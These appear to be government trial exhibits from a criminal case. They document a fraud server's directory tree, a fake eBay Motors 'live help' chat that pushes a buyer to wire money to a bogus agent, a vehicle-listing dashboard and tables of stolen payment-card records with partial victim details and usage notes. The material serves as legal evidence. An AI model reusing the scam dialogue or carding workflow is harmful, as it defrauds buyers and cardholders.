        │   │   │   ├── blocked
        │   │   │   ├── new
        │   │   │   ├── success
        │   │   │   └── used
        │   │   ├── admin
        │   │   ├── cookies
        │   │   ├── final
        │   │   ├── logs
        │   │   ├── main_logs
        │   │   └── unknown_pages_content
        │   ├── created_emails
        │   └── fetch_adds
        ├── cron
        │   └── pm
        ├── dbadmin
        │   ├── contrib
        │   ├── js
        │   │   └── jquery
        │   ├── libraries
        │   │   ├── auth
        │   │   │   └── swekey
        │   │   ├── chart
        │   │   │   └── pChart
        │   │   │       └── fonts
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                    ├── config
                    ├── dbi
                    ├── engines
                    ├── export
                    ├── import
                    │   └── upload
                    ├── php-gettext
                    ├── schema
                    ├── tcpdf
                    │   ├── cache
                    │   ├── config
                    │   │   └── lang
                    │   └── fonts
                    │       └── dejavu-fonts-ttf-2.32
                    └── transformations
            ├── pmd
            │   ├── images
            │   ├── scripts
            │   └── styles
            │       └── default
            │           └── images
            ├── scripts
            ├── setup
            │   ├── frames
            │   └── lib
            └── themes
                ├── original
                │   ├── css
                │   ├── img
                │   └── jquery
                │       └── images
                └── pmahomme
                    ├── css
                    ├── img
                    └── jquery
                        └── images
    ├── __downloads
    ├── e
    │   └── amy
    ├── extr
    ├── EZ2
    │   ├── images
    │   ├── include
    │   │   └── PHPMailer
    │   ├── inv
    │   └── messages
    ├── images
    ├── kk
    ├── kodak
    │   └── kodakweb
    ├── kodak2
    │   ├── css
    │   ├── image
    │   │   └── cgi-bin
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                    └── images
                        ├── common
                        │   └── template
                        └── quepos
                            ├── buttons
                            └── footer
        ├── list
        ├── livify
        ├── mail
        ├── MTPL
        ├── my
        │   ├── 497652
        │   ├── dropbox
        │   ├── dropbox2
        │   │   └── img
        │   └── post
        ├── my4
        │   ├── auto
        │   │   ├── attach
        │   │   ├── ckeditor
        │   │   │   ├── lang
        │   │   │   ├── plugins
        │   │   │   │   ├── clipboard
        │   │   │   │   │   └── dialogs
        │   │   │   │   ├── dialog
        │   │   │   │   ├── fakeobjects
        │   │   │   │   │   └── images
        │   │   │   │   └── link
        │   │   │   │       ├── dialogs
        │   │   │   │       └── images
        │   │   │   ├── samples
        │   │   │   │   ├── assets
        │   │   │   │   │   ├── inlineall
        │   │   │   │   │   ├── outputxhtml
        │   │   │   │   │   └── uilanguages
        │   │   │   │   └── plugins
        │   │   │   │       ├── dialog
        │   │   │   │       │   └── assets
        │   │   │   │       ├── enterkey
        │   │   │   │       ├── toolbar
        │   │   │   │       └── wysiwygarea
        │   │   │   └── skins
        │   │   │       └── moono
        │   │   │           └── images
        │   │   ├── img
        │   │   ├── logs
        │   │   ├── nicedit
        │   │   └── tmp
        │   ├── build
        │   │   ├── auto_000001
        │   │   └── auto_000002
        │   ├── dropbox2
        │   │   └── img
        │   └── img
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
            ├── my4drone
            │   └── debug
            ├── my4lib
            ├── my4pub
            ├── myextr
            ├── mylib
            ├── mypub
            │   ├── cookies
            │   ├── off
            │   ├── py
            │       └── test
            ├── _private
            ├── ps
            ├── psdrone
            │   ├── application
            │   └── forum
            ├── pspub
            │   └── log
            ├── pubdrones
            │   ├── m2
            │   └── so31
            ├── s3
            ├── s3lib
            ├── s3pub
            │   ├── log
            │   ├── off
            │   ├── plugins
            │   └── tmp
            ├── s3pub.direct
            │   └── tmp
            ├── s3test
            ├── s3tools
            ├── sox3drone
            │   ├── 302forum
            │   ├── forum
            │   ├── m2
            │   ├── s3
            │   └── so31
            ├── sox3drone.curl
            │   ├── s3
            │   └── so31
            ├── sox3ydrone.old
            │   ├── s3
            │   └── sox
            ├── soxdrone
            │   └── sox
            ├── tools
            │   ├── aol
            │   ├── distribute.obsolete
            │   ├── firstmail
            │   │   └── PHPMailer
            │   ├── lib
            │   ├── multiclock
            │   ├── phantomjs
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                        ├── test
                        └── yahoo
                            ├── cookies
                            ├── nicEditor
                            └── websend_files
                ├── _vti_bin
                │   ├── _vti_adm
                │   └── _vti_aut
                ├── _vti_cnf
                ├── _vti_log
                ├── _vti_pvt
                ├── _vti_txt
                └── x
        └── server_accounts
            └── user132303
    └── screens
        └── benny@pmlcpa.com

1472 directories
```

GOVERNMENT
EXHIBIT
1:16CR224

1137



Firefox Web Browser

forum - Mozilla Firefox

localhost / localhost / my3 |... | forum | forum | forum | forum

localhost/?s/my4/forum.php?email=bjyard17@att.net

forum
bjyard17@att.net

Help - ask eBay

For any questions you can contact eBay Motors Support by using the form below:

| | |
|---|---|
| eBay: | Be advised that when choosing the eBay agent option this auction will be restricted to this computer only. The auction will not be accessible from other computers. This is for your security, we want to make sure nobody is able to hijack your account. |
| You: | I am still waiting on this guys account # so I can pay this Invoice |
| eBay: | We would suggest using an eBay agent for this transaction and for such a large amount. You can contact us on Live Help for more details. |
| You: | I would like to speak to EBAY Rep, to Guide me Through This Transaction . My Phone Number is 770-878-1301 . |
| eBay: | Unfortunately, we do not offer customer support over the phone. Please click on the following link to get help: Live Help. |
| You: | Alright well I want to make sure that the payment I send will be held by ebay until I get the item inspected after delivery. |
| You: | Alright well I want to make sure that the payment I send will be held by ebay until I get the item inspected after delivery. |
| You: | Alright well I want to make sure that the payment I send will be held by ebay until I get the item inspected after delivery. |
| eBay: | We will provide you with an ebay agent shortly. |
| You: | ok thank you .I am ready to get the transaction done asap. |
| eBay: | We have now assigned an eBay agent. Once the payment is made please fax us the receipt at 1-866-929-3886 |
| You: | I just got a call from my bank saying the wire transfer rejected I sent yesterday .Please resend me the ebay agents info and account and routing #. |
| You: | I need you to Reinvoice Me so we can Resend the Wire Transfer to the Ebay Agent Again. |
| eBay: | Yes, there was a slight banking problem so we returned your wire. Please wait 30 minutes and check the payment again, we will reinvoice you. |
| You: | I am Not Seeing the Invoice . |
| eBay: | We have issued a new invoice please check the payment page again and rewire the money to the new agent. |
| You: | If you would please Reset The Invoice . |
| eBay: | Go to the listing and then View Payment Instructions, it is there. |
| eBay: | |

Reply to asshole

user    ‹ Previous  › Next  ☐ Highlight all  ☐ Match case  ● Phrase not found

GOVERNMENT
EXHIBIT
1:16CR224

1138





/auto/listings - Mozilla Firefox

localhost / localhost / my3 |...    /auto/listings    ✕   /auto/questions [mattschm...    forum    forum    forum    ✛

localhost/s/my4/auto/listings.php    ☆ ▾ ℃   🔍 ▾ Google    🔍 ⬇ ⌂

**/auto/listings**    1034 listings, 0 live, 0 importing, 5755 launched, 5798 unique, 8402 total questions, 19 failed aols

Retry Failed Aols    Clean Suspended Listings With No Emails

| listed by | count | average #qs | total #qs |
|-----------|-------|-------------|-----------|
| linx | 32 | 12.4063 | 397 |
| mf | 38 | 5.8947 | 224 |
| min | 947 | 8.0148 | 7590 |
| raul | 17 | 11.1176 | 189 |

| lici | ad id | ebay item | listed by | garage name | status | #qs l/u/t | links | |
|------|-------|-----------|-----------|-------------|--------|-----------|-------|---|
| auto_000001 | 28 | 261209552518 | linx | 1957_chevrolet_bel_air_150_210_2_door_convertible | SUSPENDED | 25 / 26 / 31 | var | questions |
| auto_000002 | 32 | 181134205830 | linx | 2008_jeep_wrangler_rubicon_unlimited_unlimited_rubicon_sport_utility_4_door | ENDED | 32 / 33 / 47 | var | questions |
| auto_000004 | 35 | 271200457372 | linx | 1969_dodge_charger_se_se | SUSPENDED | 11 / 11 / 14 | var | questions |
| auto_000005 | 36 | 181134232535 | linx | 1967_chevrolet_chevelle_ss_super_sport | SUSPENDED | 3 / 3 / 4 | var | questions |
| auto_000006 | 38 | 161019720110 | linx | 2005_dodge_ram_3500_slt_crew_cab_pickup_4_door | ENDED | 7 / 7 / 7 | var | questions |
| auto_000007 | 39 | 251270290263 | linx | 2010_ford_f_150_ftx_tuscany | SUSPENDED | 4 / 4 / 4 | var | questions |
| auto_000008 | 42 | 321119510942 | linx | 1969_porsche_911_911s_coupe | ENDED | 6 / 6 / 11 | var | questions |
| auto_000010 | 43 | 261210493062 | linx | 1964_ford_mustang_convertible | ENDED | 9 / 9 / 12 | var | questions |
| auto_000011 | 45 | 281102889938 | linx | 1957_cadillac_eldorado_biarritz_2_dr_convert | SUSPENDED | 8 / 8 / 9 | var | questions |
| auto_000012 | 47 | 251270947095 | linx | 1957_cadillac_eldorado_biarritz_2_dr_convert | ENDED | 13 / 13 / 22 | var | questions |
| auto_000013 | 49 | 251270957725 | linx | 2006_dodge_ram_2500_2500_dodge_cummins_diesel_laramie_leather_laramie_crew_cab_pickup_4_door | ENDED | 10 / 10 / 19 | var | questions |
| auto_000014 | 50 | 151040040069 | linx | 2010_bmw_7_series_xdrive | SUSPENDED | 11 / 11 / 12 | var | questions |
| auto_000015 | 51 | 321120406453 | linx | 2012_honda_accord_ex_l_coupe_2_door | ENDED | 1 / 1 / 1 | var | questions |
| auto_000016 | 53 | 251270973902 | linx | 2007_gmc_yukon_denali | SUSPENDED | 3 / 3 / 3 | var | questions |
| auto_000017 | 54 | 121105791473 | linx | 2003_dodge_ram_3500_slt | ENDED | 10 / 10 / 12 | var | questions |
| auto_000018 | 55 | 330918514598 | linx | 1959_chevrolet_impala_2_door_hardtop | SUSPENDED | 3 / 3 / 3 | var | questions |
| auto_000019 | 57 | 121105801917 | linx | 1990_bmw_m3_base_coupe_2_door | SUSPENDED | 9 / 9 / 11 | var | questions |
| auto_000020 | 59 | 271201340584 | linx | 1967_chevrolet_chevelle_ss_super_sport | ENDED | 8 / 8 / 8 | var | questions |

Cov. Ex-1144 Pg 1 of 1

✕ Find:  user    ◄ Previous   ► Next   ☐ Highlight all   ☐ Match case   ⊖ Phrase not found

GOVERNMENT
EXHIBIT
1:16CR224
1144

cc - Mozilla Firefox

localhost / localhost / my3 |...    cc    /auto/questions [mattschm...    forum    forum    forum

localhost/s/my4/cc.php

**cc**

**Don't use a reserved (orange) cc if you didn't reserve it!**

Search as you type: [ ]  Clear

Insert cc line: [ ]  Insert

| name | city, state | notes |
|---|---|---|
| | Santa Clarita, CA | +callfire +skype +yahooHost*7 + aol |
| | fairfield, CA | -virtualpbx |
| | Mechanicsville, VA | +skype -yahooHost |
| | Camarillo, CA | ?yahooHost |
| | Chino Hills, CA | +yahooHost*5 -omnis +virtualpbx |
| | desoto, TX | +yahooHost*9 +yahooHostship +hostmonster |
| | Philadelphia, PA | +skype +yahooHost*6 +virtualpbx hostmonster |
| | Tracy, CA | +skype -hostmonster +yahooHost*6 |
| | las vegas, NV | Minolta |
| | Kingston, MA | dreamhost 208. |
| | Suffolk, MA | dreamhost 208 creators - update billing & re-enable?? am pus pe alfsa |
| | philadelphia, PA | dreamhost rezerva 64. +indeed +yahooHost*2 |
| | cedar park, TX | +yahooHost*9 +indeed +backpage |
| | decatur, AL | +yahooHost*6 +indeed +virtualpbx |
| | huntington, MA | dreamhost 67 my*2 - update billing thai host |
| | Livingston, TX | +yahooHost*10 +indeed +editplus |
| | Woodburn, OR | +yahooHost*5 test4indeed |
| | Nashua, NH | dreamhost vps |
| | frankfurt, IL | -yahooHost |
| | Atlanta, GA | -yahooHost |
| | fresno, CA | -yahooHost |
| | santa rosa, CA | -yahooHost |
| | Burbank, IL | -virtualpbx -evoice -yahooHost-no ?? |
| | CLIFFSIDE PARK, NJ | -yahooHost -virtualpbx |
| | Queens, NY | +compuserve +yahooHost*3 +hostmonster |
| | San Francisco, CA | |
| | newark, NJ | |

id [ ]

name [ ]

address1 [ ]

address2 [ ]

city [ ]  state [ ]

zip [ ]

phone [ ]

cc [ ]

expm [ ]  expy [ ]  cvv [ ]

notes [ ]

good ☐

reserved ☐

[ Update ]  [ Delete ]

Previous   Next   Highlight all   ☐ Match case   Phrase not found

GOVERNMENT
EXHIBIT
1:16CR224

1149



| key | value | actions |
|---|---|---|
| car | 1 | Update | Delete |
| garage_name | 1957_chevrolet_bel_air_150_210_2_door_convertible | Update | Delete |
| has_history_report | 0 | Update | Delete |
| has_live_help | 1 | Update | Delete |
| live_link | http://livehelp.corp.ebay.com/chat.php?id=156 sess=igewkfEWqejijdasjghufeuwighsSsegeGR-EHREHdsasdq325Ddsq6talk=1 | Update | Delete |
| day_listing | 7 | Update | Delete |
| sells_to | United States, Canada | Update | Delete |
| item_number | 2093187120763 | Update | Delete |
| item_auction_name | 1957 chevy chevrolet 57 belair Convertible 210 150 2 door white, Black top | Update | Delete |
| year | 1957 | Update | Delete |
| make | Chevrolet | Update | Delete |
| model | Bel Air/150/210 | Update | Delete |
| miles | 60,085 | Update | Delete |
| submodel | | Update | Delete |
| vin | VC57B214704 | Update | Delete |

GOVERNMENT
EXHIBIT
1:16CR224

1155

1 Bertke - cc table                                    C and C server Dreamhost 206

| name | | address1 | | city | state | cc | | expm | expy | cvv | notes |
|------|--|----------|--|------|-------|-----|--|------|------|-----|-------|
| Edu | | 12 | | Studio City | CA | | | 6 | 2013 | | minolta |
| larry | | 46 | | muskogee | OK | | | 2 | 2013 | | minolta de testat |
| Davi | | 17 | lay | Rushville | IN | | | 3 | 2013 | | minolta, -yahooHost |
| Rich | | 40 | | Cape Coral | FL | | | 8 | 2014 | | proasta |
| Dan | | 68 | s | Gurnee | IL | | | 9 | 2014 | 6 | proasta |
| Ken | | 40 | | La Verne | CA | | | 9 | 2014 | | natiune 1-10-2012 -> 3 cumparaturi |
| john | inc | 61 | | bradford | PA | | | 9 | 2014 | | natiune 1-10-2012 |
| tho | | po | | canyon lake | TX | | | 1 | 2015 | | prost |
| JAM | | 23 | | stonybrook | NY | | | 1 | 2015 | | natiune (enom.com) 12-10-2012 / linx yahoo plus |
| Nich | | 74 | | Philadelphia | PA | | | 2 | 2015 | | |
| Nich | | 12 | | Phoenixville | XX | | | 2 | 2015 | | |
| ranc | | 15 | | micanopy | FL | | | 2 | 2015 | | natiune host 12-10-2012 |
| Bob | | 13 | e. | Palm Bay | FL | | | 2 | 2015 | | natiune host 12-10-2012 / linx yahoo plus |
| Nich | | 12 | | Phoenixville | PA | | | 2 | 2015 | | |
| mitc | | 12 | | manchester | IA | | | 2 | 2015 | | |
| Jon | | 12 | | naperville | IL | | | 3 | 2015 | 2 | |
| Dan | | 13 | | Jefferson City | MO | | | 3 | 2015 | | natiune host 12-10-2012 |
| ralp | | 12 | d | jesup | GA | | | 3 | 2015 | | natiune host 12-10-2012/ linx yahoo plus |
| Arar | | 10 | e | Potomac | MD | | | 3 | 2015 | | natiune host 12-10-2012 |
| gary | | 17 | ray rd | lewes | DE | | | 5 | 2014 | | linx yahoo plus / AOL |
| paul | | 22 | | hershey | PA | | | 12 | 2013 | | minolta |
| RAY | | 58 | NUE | WETHERSFIELD | CT | | | 11 | 2013 | 6 | minolta multe cumparaturi dar mai merge |
| Mar | | 10 | d | Shippensburg | PA | | | 10 | 2013 | | minolta multe cumparaturi dar mai merge |
| And | | 32 | Terrace | Chico | CA | | | 8 | 2013 | | minolta multe cumparaturi dar mai merge |
| geo | | 23 | | Inglewood | CA | | | 7 | 2013 | | minolta multe cumparaturi dar mai merge |
| Gilb | | 35 | | Reedsville | WV | | | 7 | 2013 | | minolta mort |
| jam | | 11 | | miami | FL | | | 5 | 2013 | | minolta mort |
| jeffr | | 79 | | wonder lake | IL | | | 4 | 2013 | | minolta mort |
| DAV | | 12 | ET | BOSTON | MA | | | 4 | 2013 | | minolta mort |

GOVERNMENT
EXHIBIT
1:16CR224

1165

Gov. Ex. 1165 Pg 1 of 10

2 Bertke - cc table                     C and C server Dreamhost 206

| | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|
| M! | io | 35 | | East Amherst | NY | | 3 | 2013 | 9( | minolta multe cumparaturi dar mai mergea |
| ph | | 27 | | williamsport | PA | | 12 | 2012 | | minolta mort |
| Ro | | 33 | | Cocoa | FL | | 12 | 2012 | | minolta mort |
| Ge | | 14 | | texas city | TX | | 11 | 2012 | | minolta mort |
| | | | | | | | | | | 29-10-2012 natiune ymall |
| KE | N | 11 | | KEWANEE | IL | | 10 | 2014 | | +yahooHost -yahooHost |
| Ra | / | 35 | | NY | 13069 | | 11 | 2013 | | keke |
| Fri | | 34 | | Lake in the Hills | IL | | 4 | 2013 | 6! | -yahooHost |
| Jo | | 65 | | Norwood | MA | | 7 | 2013 | | keke |
| ro | | p.( | | pittsburg | TX | | 4 | 2016 | | |
| Ba | | 18 | ad | Abingdon | VA | | 5 | 2014 | | |
| ge | | po | | amma | WV | | 7 | 2014 | | |
| | | | | | | | | | | |
| Bo | | 12 | | irwin | XX | | 12 | 2012 | | testing pt hostinguri NU folositi |
| Ed | | 72 | | Clare | MI | | 3 | 2013 | | dreamhost vps -yahooHost |
| M | ra | 14 | | Nashua | NH | | 2 | 2013 | | dreamhost vps |
| Ro | | 82 | | Bull Valley | IL | | 2 | 2013 | | Skype |
| | | | | | | | | | | yahoo hostx2, failed skype - |
| jol | | 30 | | unadilla | NY | | 1 | 2013 | | yahooHost |
| Da | | 25 | | Muskegon | MI | | 1 | 2013 | | skype |
| Ca | amirez | 39 | | Keller | TX | | 12 | 2012 | | keke |
| Gl | | | | | | | | | | Skype |
| an | | 12 | | mlami | FL | | 1 | 2013 | | MORT |
| Eli | | 13 | | Hawthorne | CA | | 4 | 2013 | | MORT |
| An | | 70 | | Hammond | IN | | 4 | 2013 | | beemer mort |
| Ro | | 23 | | Collinsville | VA | | 4 | 2013 | | beemer |
| jef | | 20 | | bethlehem | PA | | 9 | 2013 | | qwe Skype |
| Jo | | 50 | | los Angeles | CA | | 6 | 2013 | | beemer |
| Lir | | 58 | | Riverside | CA | | 6 | 2013 | | beemer |
| gu | | 47 | | brooklyn | XX | | 8 | 2013 | 9( | beemer |
| | | | | | | | | | | |
| Ar | | 19 | .ane | Gaithersburg | MD | | 4 | 2013 | | linx yahoo plus, -yahooHost |
| | | | | | | | | | | mort |
| | | | | | | | | | | mort |
| | | | | | | | | | | mort |
| | | | | | | | | | | mort |

Gov. Ex. 1165 Pg 2 of 10

3 Bertke - cc table                    C and C server Dreamhost 206

| | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|
| g | 4 | | | brooklyn | NY | | 8 | 2013 | 9 | natiune / drona att (6-02-13), yah drona +yahooHost -indeed |
| le | 4 | | | muskogee | OK | | 5 | 2013 | | natiune / drona ipage (6-02-13) drona presenttravel (15-02-13) |
| S | 1 | | | Felton | CA | | 10 | 2013 | | MORT |
| | | | | | | | | | | mort |
| | | | | | | | | | | mort |
| | | | | | | | | | | mort |
| | | | | | | | | | | mort |
| Je | 1 | | | Columbus | OH | | 12 | 2013 | | MORT |
| n | 3 | | | little ferry | NJ | | 3 | 2013 | 6 | -yahooHost craisg phone |
| lli | 1 | | | KENOSHA | WI | | 3 | 2013 | | mort |
| G | 6 | 121 | | San Jose | CA | | 4 | 2013 | | craigs phone / indeed  MORT |
| K | P | | | Pocono Summit | PA | | 5 | 2013 | | craigs phone MORT |
| R | 6 | | | Millmont | PA | | 5 | 2013 | | craigs phone MORT |
| D | 3 | | | Americus | KS | | 6 | 2013 | | mort |
| Je | 2 | eet | | Tunkhannock | XX | | 7 | 2013 | | mort |
| c | 2 | | | fort recovery | OH | | 7 | 2013 | | craigs phone +yahoo hosting +yahooHost -indeed |
| je | N | Cr. | | Sussex | WI | | 8 | 2013 | | craigs phone +yahooHost*2 unknown error |
| C | 1 | | | Madison | AL | | 10 | 2013 | | mort |
| jc | 7 | ue | | baltimore | MD | | 11 | 2013 | | craigs phone MORT |
| tl | 2 | | | lebanon | PA | | 3 | 2013 | | yahoo x2 mort |
| tc | 1 | | | pearland | TX | | 11 | 2013 | | craigs phone |
| F | 2 | | | Glenside | PA | | 1 | 2014 | | craigs phone / indeed, securecrt,+yahooHost*5 |
| D | P | | | Hardyville | VA | | 2 | 2014 | 6 | craigs phone, yahoo - yahooHost |
| w | 9 | ay | | Kyle | TX | | 2 | 2014 | | craigs phone +yahooHost - yahooHost |
| N | 1 | | | Millville | PA | | 7 | 2014 | | indeed MORT |
| T | 4 | | | Westfield | PA | | 7 | 2014 | | craigs phone / indeed mort |
| V | | | | Mesquite | TX | | 8 | 2014 | | mort |

Gov. Ex. 1165 Pg 3 of 10

4 Bertke - cc table                    C and C server Dreamhost 206

| | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|
| | | | | | | | | | craigs phone +yahooHost*2 +indeed -yahooHost unknown |
| Jar | 2( | Farmington Hills | MI | ( | ) | | 9 | 2014 | error |
| AN | 1! | LOS ANGELES | CA | ( | ) | | 9 | 2014 | craigs phone / skype / vumber MORT |
| sh | 2( | pierson station | IL | ( | ) | | 10 | 2014 | craigs phone / Indeed, yahoo plus +yahooHost -yahooHost |
| | | | | ( | ) | | | | yahoo SMS, nu il folositi |
| Ric | 1: | Henry | VA | ( | ) | | 5 | 2013 | rezervat minolta |
| Ro | 2: | Chicago | IL | ( | ) | | | | rezervat minolta |
| ma | 1( | des plaines | IL | ( | ) | | 6 | 2013 | used , Chayiohosting |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | | | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | ( | ) | | | | mort |
| — | — | | | | ) | | | | mort |

Gov. Ex. 1165 Pg 4 of 10

5 Bertke - cc table               C and C server Dreamhost 206

| | | | | | | | |
|---|---|---|---|---|---|---|---|
| eet | Houston | TX | | 0 | 4 | 2013 | -yahooHost |
| | stanhope | NJ | | 0 | 4 | 2013 | +yahooHost*5 +Indeed -skype |
| | hicksville | NY | | 0 | 3 | 2013 | -yahooHost |
| | Winnetka | CA | | 0 | 5 | 2013 | +yahooHost -yahooHost |
| | Chandler | AZ | | 0 | 5 | 2013 | +yahooHost*5 +Indeed |
| | Shiloh | IL | | 0 | 6 | 2013 | -yahooHost |
| t | San Carlos | CA | | 0 | 6 | 2013 | -yahooHost*6 +Indeed |
| r. | Dallas | TX | | 0 | 7 | 2013 | +yahooHost*3 -Indeed |
| re | Costa Mesa | CA | | 0 | 7 | 2013 | +yahooHost*3 -Indeed |
| | Woodburn | OR | | 0 | 7 | 2013 | +yahooHost*5 test4Indeed |
| pt 9 | Hyattsville | MD | | 0 | 8 | 2013 | -yahooHost |
| | detroit | MI | | 0 | 8 | 2013 | -yahooHost |
| | Belfast | NY | | 0 | 8 | 2013 | -yahooHost |
| | POWDER SPRING | GA | | 0 | 8 | 2013 | +yahooHost*3 -Indeed |
| | Chicago | IL | | 0 | 9 | 2013 | -yahooHost |
| | Livingston | TX | | 0 | 9 | 2013 | +yahooHost*10 +Indeed +editplus |
| Dr | Peoria | IL | | 0 | 9 | 2013 | -yahooHost |
| Drive | Haslet | TX | | 0 | 9 | 2013 | -yahooHost |
| | LYNWOOD | CA | | 0 | 10 | 2013 | +yahooHost -yahooHost |
| | Tustin | CA | | 0 | 10 | 2013 | -yahooHost |
| ot 5 | Memphis | TN | | 0 | 11 | 2013 | -yahooHost |
| | Baltimore | MD | | 0 | 11 | 2013 | -yahooHost |
| | Celina | OH | | 0 | 12 | 2013 | -yahooHost |
| DR. | GARLAND | TX | | 0 | 3 | 2013 | -yahooHost |
| | huntington | MA | | 0 | 6 | 2013 | dreamhost 67 my*2 - update billing thai host |
| | Boise | ID | | 5 | 6 | 2013 | +yahooHost*2 +vumber +Indeed -yahooHost |
| | sanger | CA | | 0 | 7 | 2013 | +yahooHost*2 +skype +Indeed |
| | Middleburg | PA | | 0 | 7 | 2013 | -yahooHost |
| | LAGUNA NIGUEL | CA | | 0 | 7 | 2013 | -yahooHost |
| | Long Beach | CA | | 0 | 7 | 2013 | +yahooHost -yahooHost |
| | philadelphia | PA | | 0 | 1 | 2014 | -yahooHost |
| l. | decatur | AL | | 0 | 1 | 2014 | +yahooHost*6 +Indeed +virtualpbx |
| | waxahachie | TX | | 0 | 1 | 2014 | -yahooHost |

Gov. Ex. 1165 Pg 5 of 10

6 Bertke - cc table

C and C server Dreamhost 206

| | | City | State | | # | Year | Notes |
|---|---|---|---|---|---|---|---|
| | | Orange | CA | | 1 | 2014 | -yahooHost +yahooHost*2 |
| | | LOS ANGELES | CA | | 1 | 2014 | +yahooHost*3 -indeed |
| | | Arlington | TX | | 1 | 2014 | -yahooHost |
| | | ferndale | MI | | 2 | 2014 | -yahooHost |
| | | los angeles | CA | | 2 | 2014 | -yahooHost |
| | | Palmdale | CA | | 2 | 2014 | -yahooHost |
| | | Philadelphia | PA | | 2 | 2014 | -yahooHost unknown error |
| | | dallas | GA | | 2 | 2014 | -yahooHost |
| | | San francisco | CA | | 2 | 2014 | +yahooHost*2 +indeed +monster.com -yahooHost |
| | | Jackson | GA | | 2 | 2014 | -yahooHost |
| | | corpus christi | TX | | 3 | 2014 | -yahooHost |
| | | Stinnett | KY | | 3 | 2014 | -yahooHost +yahooHost |
| | | glendale | AZ | | 3 | 2014 | +yahooHost*3 -indeed |
| | | Austin | TX | | 3 | 2014 | -yahooHost unknown error |
| | | GILLETTE | NJ | | 10 | 2013 | -yahooHost |
| | | New York | NY | | 4 | 2014 | -yahooHost |
| | | Arvada | CO | | 4 | 2014 | +yahooHost*3 +indeed -yahooHost |
| | | Arvada | CO | | 4 | 2014 | +yahooHost*6 +indeed |
| | | BROOKLYN | NY | | 4 | 2014 | -yahooHost |
| | | stockbridge | GA | | 4 | 2014 | -yahooHost |
| | | Novato | CA | | 4 | 2014 | -yahooHost |
| | | chandler | AZ | | 5 | 2014 | -yahooHost |
| | | sacramento | CA | | 5 | 2014 | -yahooHost |
| | ird | Cape Girardeau | MO | | 5 | 2014 | -yahooHost unknown error |
| | | Claremore | OK | | 7 | 2014 | +hostmonster +rapidfax |
| | | columbus | OH | | 6 | 2014 | -yahooHost |
| | | conyers | GA | | 6 | 2014 | -yahooHost |
| | | atlanta | GA | | 6 | 2014 | -yahooHost +yahooHost |
| | | trussville | AL | | 8 | 2013 | jobvertise.com, monster.com (390), beyond.com (500) +indeed +yahooHost*2 |
| | | Lavelle | PA | | 6 | 2014 | +yahooHost*4 +indeed |
| | | ANTIOCH | CA | | 6 | 2014 | +yahooHost*3 +indeed - |
| | | Novato | CA | | 6 | 2014 | -yahooHost |
| | | Los Angeles | CA | | 7 | 2014 | -yahooHost |
| | | Elkhorn | WI | | 7 | 2014 | -yahooHost |

Gov. Ex. 1165 Pg 6 of 10

7 Bertke - cc table

C and C server Dreamhost 206

| | | | City | State | | | | Month | Year | | Notes |
|---|---|---|---|---|---|---|---|---|---|---|---|
| | | | Fredericksburg | VA | | | | 7 | 2014 | | +yahooHost +indeed adwords - |
| | | | cedar park | TX | | | | 7 | 2014 | | +yahooHost*9 +indeed |
| | | | kankakee | IL | | | | 7 | 2014 | | -yahooHost |
| | | | casper | WY | | | | 7 | 2014 | | +yahooHost*3 +indeed |
| | | | Costa Mesa | CA | | | | 7 | 2014 | | -yahooHost |
| | | | Dix Hills | NY | | | | 7 | 2014 | | aprilie +yahooHost*3 +indeed +facebook + skype -callfire |
| | | | Harrison | NJ | | | | 7 | 2014 | | -yahooHost |
| | | | Long Beach | CA | | | | 8 | 2014 | | -yahooHost*2 +indeed +backpage |
| | | | Buena Park | CA | | | | 8 | 2014 | | -yahooHost*2 +indeed |
| | | | Valdosta | GA | | | | 8 | 2014 | | -yahooHost |
| | | | sandwich | IL | | | | 8 | 2014 | | -yahooHost |
| | | | Reseda | CA | | | | 8 | 2014 | | +yahooHost*3 +indeed +fb |
| | | | South Holland | IL | | | | 8 | 2014 | | -yahooHost |
| | | | Afton | VA | | | | 8 | 2014 | | -yahooHost |
| | | | Houston | TX | | | | 8 | 2014 | | -yahooHost |
| | | | stone mountain | GA | | | | 8 | 2014 | | -yahooHost |
| | | | westminster | CA | | | | 8 | 2014 | | -yahooHost |
| | | | Stafford | VA | | | | 8 | 2014 | | +yahooHost*3 -indeed +skype -dream +norton -callfire |
| | | | Bronx | NY | | | | 9 | 2014 | | -yahooHost +indeed +craigs |
| | | | barton | MD | | | | 9 | 2014 | | -yahooHost |
| | | | Homestead | FL | | | | 10 | 2014 | | -yahooHost -indeed |
| | | | concord | CA | | | | 10 | 2014 | | -yahooHost |
| | | | Lawrence | KS | | | | 10 | 2014 | | -yahooHost |
| | | | Savannah | GA | | | | 10 | 2014 | | +yahooHost*2 +indeed |
| | | | WORCESTER | MA | | | | 10 | 2014 | | -yahooHost +indeed |
| | | | leominster | MA | | | | 10 | 2014 | | |
| | | | Durham | NC | | | | 10 | 2014 | | +yahooHost*2 +indeed +callfire |
| | | | Norcross | GA | | | | 10 | 2014 | | +indeed +yahooHost*3 +bing -norton |
| | | | Santa Ana | CA | | | | 11 | 2013 | | +indeed -yahooHost |
| | | | Austin | TX | | | | 9 | 2013 | | -yahooHost -indeed |

Gov. Ex. 1165 Pg 7 of 10

8 Bertke - cc table

C and C server Dreamhost 206

| | | City | State | | | Year | Notes |
|---|---|---|---|---|---|---|---|
| K | 4 | Los Angeles | CA | ) | 4 | 2013 | +indeed +postjobfree.com - pvaspot -yahooHost |
